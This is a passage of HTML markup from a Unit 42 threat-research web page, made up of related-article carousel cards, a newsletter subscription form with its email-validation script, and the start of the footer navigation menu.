                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="13" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="Person in a blurred motion is working on a computer with screen showing lines of code, emphasizing a dynamic and intense focus on software development or programming in a dimly lit room." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/06_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-07-10T19:00:54+00:00">July 10, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files" tabindex="-1">
                    <h4 class="post-title">DarkGate: Dancing the Samba With Alluring Excel Files</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/sandbox/" title="Sandbox" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Sandbox" tabindex="-1">Sandbox</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-excel/" title="Microsoft Excel" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:Microsoft Excel" tabindex="-1">Microsoft Excel</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/malware-as-a-service/" title="malware-as-a-service" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:malware-as-a-service" tabindex="-1">Malware-as-a-service</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/" title="DarkGate: Dancing the Samba With Alluring Excel Files" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:DarkGate: Dancing the Samba With Alluring Excel Files:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="14" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-786x368.png" class="lozad" alt="Constellation image representing the constellation schema used by Palo Alto Networks Unit 42 to track nation-state and cybercrime threat actor groups" decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-786x368.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-1493x700.png 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-768x360.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1-1536x720.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Generic-B-1920x900-1.png 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-actor-groups/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Threat Actor Groups" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg" alt=" category icon">Threat Actor Groups</span></a>                        <span class="post-pub-date"><time datetime="2024-06-28T01:00:15+00:00">June 27, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/threat-actor-groups-tracked-by-palo-alto-networks-unit-42/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42" tabindex="-1">
                    <h4 class="post-title">Threat Actor Groups Tracked by Palo Alto Networks Unit 42</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/academic-serpens/" title="Academic Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Academic Serpens" tabindex="-1">Academic Serpens</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/agent-serpens/" title="Agent Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Agent Serpens" tabindex="-1">Agent Serpens</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/agonizing-serpens/" title="Agonizing Serpens" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:Agonizing Serpens" tabindex="-1">Agonizing Serpens</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/threat-actor-groups-tracked-by-palo-alto-networks-unit-42/" title="Threat Actor Groups Tracked by Palo Alto Networks Unit 42" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Threat Actor Groups Tracked by Palo Alto Networks Unit 42:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="15" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="A laptop on a desk displaying a vibrant graphical interface with a circular red pattern, possibly representing cybersecurity or data analysis. The laptop is illuminated by the screen’s glow in a dimly lit room, which also shows a blurred background suggesting a secondary monitor and small desk objects." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/03_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-05-16T10:00:02+00:00">May 16, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples" tabindex="-1">
                    <h4 class="post-title">Payload Trends in Malicious OneNote Samples</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/malvertising/" title="malvertising" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:malvertising" tabindex="-1">Malvertising</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-onenote/" title="Microsoft OneNote" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:Microsoft OneNote" tabindex="-1">Microsoft OneNote</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/phishing/" title="phishing" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:phishing" tabindex="-1">Phishing</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/" title="Payload Trends in Malicious OneNote Samples" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Payload Trends in Malicious OneNote Samples:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="16" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="393" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png" class="lozad" alt="Zoomed in Unit 42 logo." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-786x393.png 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1400x700.png 1400w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-768x384.png 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog-1536x768.png 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/02/banner-blog.png 2002w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/trend-reports/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Trend Reports" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-report-white-1.svg" alt=" category icon">Trend Reports</span></a>                        <span class="post-pub-date"><time datetime="2024-02-20T14:12:31+00:00">February 20, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" tabindex="-1">
                    <h4 class="post-title">2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/aws/" title="AWS" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:AWS" tabindex="-1">AWS</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/microsoft-azure/" title="Microsoft Azure" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Microsoft Azure" tabindex="-1">Microsoft Azure</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/muddled-libra/" title="Muddled Libra" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:Muddled Libra" tabindex="-1">Muddled Libra</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/unit42-incident-response-report-2024-threat-guide/" title="2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:2024 Unit 42 Incident Response Report: Navigating the Shift in Cybersecurity Threat Tactics:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div><div class="pa l-card l-card--slider slick-slide slick-cloned" style="width: 301px;" data-slick-index="17" id="" aria-hidden="true" tabindex="-1">
              <div class="card-media ">
                              <figure>
                <img width="786" height="368" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg" class="lozad" alt="Close-up view of a digital screen displaying a distorted and pixelated image of a skull-like visage with a strong emphasis on blue and purple tones." decoding="async" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-786x368.jpg 786w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1493x700.jpg 1493w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-768x360.jpg 768w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900-1536x720.jpg 1536w, https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/02_Malware_Category_1920x900.jpg 1920w" sizes="(max-width: 786px) 100vw, 786px">                </figure> 
                            </div>
              <div class="card-content">
                <div class="card-content__wrapper">
                  <a class="card-category" href="https://unit42.paloaltonetworks.com/category/threat-research/" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Threat Research" tabindex="-1"><span class=""><img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg" alt=" category icon">Threat Research</span></a>                        <span class="post-pub-date"><time datetime="2024-02-12T14:00:28+00:00">February 12, 2024</time></span>
                  <a href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit" tabindex="-1">
                    <h4 class="post-title">Diving Into Glupteba's UEFI Bootkit</h4>
                  </a>
                  <ul class="card-tags" role="list">
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/cryptocurrency-mining/" title="Cryptocurrency mining" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Cryptocurrency mining" tabindex="-1">Cryptocurrency mining</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/credential-stealer/" title="credential stealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:credential stealer" tabindex="-1">Credential stealer</a>
				</li>
				<li role="listitem">
					<a href="https://unit42.paloaltonetworks.com/tag/redline-infostealer/" title="Redline infostealer" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:Redline infostealer" tabindex="-1">Redline infostealer</a>
				</li></ul>                </div>
                <div class="card-content__link">
                                    <a class="hyperlink" href="https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/" title="Diving Into Glupteba's UEFI Bootkit" role="link" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:related-resources:Diving Into Glupteba's UEFI Bootkit:read now" tabindex="-1">
                    Read now                    <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg" alt="Right arrow">
                  </a>
                </div>
              </div>
            </div></div></div></div>
    </div>
    <div class="l-container bs__controls">
      <div class="bs__progress"><span style="width: 13.765%;"></span></div>
      <div class="bs__navigation"> 
        <ul>
          <li> 
            <button id="prevButton"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg" alt="Slider arrow"></button>
          </li>
          <li> 
            <button id="nextButton"> <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg" alt="Slider arrow"></button>
          </li>
        </ul>
      </div>
    </div>
  </div>
 
        <div class="be-enlarge-modal" id="enlargedModal">
          <div class="be-enlarge-modal__wrapper"> 
            <figure> 
              <button class="close__modal" id="closeModal"> 
              <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg" alt="Close button"></button>
              <img class="be__enlarged-image" id="enlargedImage" src="" alt="Enlarged Image">
              <figcaption> </figcaption>
            </figure>
          </div>
        </div>

      </div>
    </section>
  </main>
<!--  Start: Footer subscription form -->
<div class="newsletter">
      <div class="l-container">
        <div class="newsletter__wrapper">
          <div class="image__wrapper"> 
            <picture>
			                 <source class="lozad" media="(max-width:400px)" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/newsletter-Image-mobile.webp">
			  			                  <source class="lozad" media="(max-width:949px)" data-srcset="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/newsletter-Image-tab.webp">
			  			  			  	<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/Revitalized_newsletter-Image-desktop-copy-1.webp" alt="Newsletter">
			              </picture>
          </div>
          <div class="content__wrapper"> 
		    							<span class="pre-title"> 
				<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg" alt="UNIT 42 Small Logo">
				Get updates from Unit 42			</span>
						           	 <h2>Peace of mind comes from staying ahead of threats. Contact us today.</h2>
			            <form action="https://www.paloaltonetworks.com/apps/pan/public/formsubmithandler.submitform.json" method="post" novalidate="" class="subscribe-form" name="Unit42_Subscribe" id="unit42footerSubscription_form">
              <input type="hidden" name="emailFormMask" value="">
              <input type="hidden" value="1086" name="formid">
              <input type="hidden" value="531-OCS-018" name="munchkinId">
              <input type="hidden" value="2141" name="lpId">
              <input type="hidden" value="1203" name="programId">
              <input type="hidden" value="1086" name="formVid">
              <input type="hidden" name="mkto_optinunit42" value="true">
              <input type="hidden" name="mkto_opt-in" value="true">
              <div class="form-group"> 
                <label for="newsletter-email" id="newsletter-email-label">Your Email</label>
                <input type="emal" placeholder="Your Email" name="Email" class="subscribe-field" id="newsletter-email" aria-labelledby="newsletter-email-label">
                <p class="error-mail mb-15 text-danger" style="color: #dc3545"></p>
				<p>Subscribe for email updates to all Unit 42 threat research.<br>By submitting this form, you agree to our <a title="Terms of Use" href="https://www.paloaltonetworks.com/legal-notices/terms-of-use" data-page-track="true" data-page-track-value="Get updates from Unit 42:Terms of Use">Terms of Use</a> and acknowledge our <a title="Privacy Statement" href="https://www.paloaltonetworks.com/legal-notices/privacy" data-page-track="true" data-page-track-value="Get updates from Unit 42:Privacy Statement">Privacy Statement.</a></p>
                <div class="g-recaptcha" data-expired-callback="captchaExpires" data-callback="captchaComplete" data-sitekey="6Lc5EhgTAAAAAJa-DzE7EeWABasWg4LKv-R3ao6o"></div>
                <p class="error-recaptcha d-none mt-15 text-danger" style="color: #dc3545">Invalid captcha!</p>
                <button class="l-btn is-disabled" data-page-track="true" data-page-track-value="footer:Get updates from Unit 42:Subscribe" id="unit42footerSubscription_form_button"> 
					Subscribe					<img class="lozad" data-src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg" alt="Right Arrow">
					<img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg" alt="loader" class="loader">
			   </button>
				<div class="form-success-message"></div>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>

<script>

(function($) {
	// Migrated from the unit42-v5 + Modifications
	var subscribeSuccess = false;
	var email = document.getElementById('newsletter-email');
	var subscription_form = document.getElementById('unit42footerSubscription_form');
	var subscription_form_button = document.getElementById('unit42footerSubscription_form_button');
	window.captchaComplete = function() {
		subscribeSuccess = true;
		if ($(mail).val() != '' && isEmail($(mail).val())) {
			$(subscription_form_button).removeClass('is-disabled');
		}
		setTimeout(function() {
			$(email).focus();
			$('.g-recaptcha iframe').attr('tabindex', '-1');
		}, 100)
	}
	window.captchaExpires = function() {
		subscribeSuccess = false;
		$(subscription_form_button).addClass('is-disabled', true);
	} 
	$(subscription_form).submit(function(e) {
		e.preventDefault();
		e.stopImmediatePropagation();
		updateEmailMask();
		var success = true;
		var form = $(this);
		var mail = form.find('input[name="Email"]');
		
		if (mail.val() === '') {
			mail.addClass('has-error');
			showError(1);
			success = false;	
		}  else if (!isEmail(mail.val())){
			showError(2);
			success = false;
		}
		else {
			mail.removeClass('has-error');
			$('.error-mail').addClass('d-none');
		}

		if (!subscribeSuccess) {
			$('.error-recaptcha').removeClass('d-none');
		} else {
			$('.error-recaptcha').addClass('d-none');
		}

		if (success && subscribeSuccess) {
			$.ajax({
				type: 'POST',
				url: form.attr('action'),
				data: form.serialize(),
				beforeSend: function() {
                 form.find('button').addClass('is-loading');
    			},
				success: function(msg) {
					form.find('.form-success-message').html('<p class="success-message">You have been successfully subscribed</p>');
					form.find('button').removeClass('is-loading');
					$(email).val('');
					clearError();
				},
				error: function(jqXHR, textStatus, errorThrown) {
					$(subscription_form_button).addClass('is-disabled', true);
					form.find('button').removeClass('is-loading');
					
				}
			});
		}
		return false;
	});
	function showError(error_type){
		if(error_type == 1) {
			$('.error-mail').text("Please enter the email address.").addClass('error-show');
			$(subscription_form_button).addClass('is-disabled');
		} else if(error_type == 2){
			$('.error-mail').text("Please provide a valid e-mail address.").addClass('error-show');
			$(subscription_form_button).addClass('is-disabled');
		}	
		$(subscription_form_button).removeClass('is-loading');
	}
	function clearError(){
		$('.error-mail').text("").removeClass('error-show');;
		$(subscription_form_button).removeClass('is-loading');
		$(subscription_form_button).removeClass('is-disabled');
	}
	
	$(email).on('input', function (event) { 
		var email = $(this).val();
		if (isEmail(email) ) {			
			clearError();
		} else if(email == ""){
			clearError();
		} else{
			showError(2);			  
		}
    });

	function isEmail(email) {
		var re = /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
		return re.test(String(email).toLowerCase());
	}
	
	var captcha_loaded = false;
         if(!captcha_loaded){
            // recaptcha on foucs call
            $(document).on('change paste keyup', '#newsletter-email', function () {
               if($('.g-recaptcha').hasClass('d-none')){
                $('.g-recaptcha').removeClass('d-none');
               }
               if(!captcha_loaded ){
                  captcha_loaded  = true;
                  // trigger loading api.js (recaptcha.js) script
                  var head = document.getElementsByTagName('head')[0];
                  var script = document.createElement('script');
                  script.type = 'text/javascript';
                  script.src = 'https://www.google.com/recaptcha/api.js?hl=en_US';
                  head.appendChild(script);
               }
            });
        }
	
	function updateEmailMask() {
		var email = $("#unit42footerSubscription_form input[name='Email']").val();
		if (email && email.trim() != '') {
			var maskedEmail = maskEmailAddress(email);
			$("#unit42footerSubscription_form input[name='emailFormMask']").val(maskedEmail);
		}
	}

	function maskEmailAddress (emailAddress) {
		function mask(str) {
			var strLen = str.length;
			if (strLen > 4) {
				return str.substr(0, 1) + str.substr(1, strLen - 1).replace(/\w/g, '*') + str.substr(-1,1);
			}
			return str.replace(/\w/g, '*');
		}
		return emailAddress.replace(/([\w.]+)@([\w.]+)(\.[\w.]+)/g, function (m, p1, p2, p3) {
			return mask(p1) + '@' + mask(p2) + p3;
		});

		return emailAddress;
	}

}(jQuery));
//# sourceMappingURL=main.js.map
	
</script>
<!--  End: Footer subscription form -->

<footer class="footer"> 
  <div class="footer-menu">
    <div class="l-container">
      <div class="footer-menu__wrapper">
        <div class="footer-menu-nav__wrapper">
                      <h3 class="footer-menu-nav__title">Products and services</h3>
                                <div class="nav-column__wrapper"> 
            <div class="nav-column">
              													<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/network-security" role="link" title="Network Security Platform" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform" target="_blank">Network Security Platform</a>
						</li>    
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/network-security/security-subscriptions" role="link" title="CLOUD DELIVERED SECURITY SERVICES" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES" target="_blank">CLOUD DELIVERED SECURITY SERVICES</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/advanced-threat-prevention" role="link" title="Advanced Threat Prevention" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention" target="_blank">Advanced Threat Prevention</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/advanced-dns-security" role="link" title="DNS Security" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security" target="_blank">DNS Security</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/enterprise-data-loss-prevention" role="link" title="Data Loss Prevention" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention" target="_blank">Data Loss Prevention</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/enterprise-iot-security" role="link" title="IoT Security" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security" target="_blank">IoT Security</a>
						</li>    
					        
					</ul>
				</nav>
																		<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/network-security/next-generation-firewall" role="link" title="Next-Generation Firewalls" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls" target="_blank">Next-Generation Firewalls</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/next-generation-firewall-hardware" role="link" title="Hardware Firewalls" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls" target="_blank">Hardware Firewalls</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
							<a href="https://www.paloaltonetworks.com/network-security/strata-cloud-manager" role="link" title="Strata Cloud Manager" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager" target="_blank">Strata Cloud Manager</a>
						</li>    
					        
					</ul>
				</nav>
																		<nav>
					<ul class="footer-menu-nav__list"> 
																	<li class="footer-menu-nav__item nav-title"> 
							<a href="https://www.paloaltonetworks.com/sase" role="link" title="SECURE ACCESS SERVICE EDGE" data-page-track="true" data-page-track-value="footer:Products and services:Network Security Platform:CLOUD DELIVERED SECURITY SERVICES:Advanced Threat Prevention:DNS Security:Data Loss Prevention:IoT Security:Next-Generation Firewalls:Hardware Firewalls:Strata Cloud Manager:SECURE ACCESS SERVICE EDGE" target="_blank">SECURE ACCESS SERVICE EDGE</a>
						</li>    
																	<li class="footer-menu-nav__item "> 
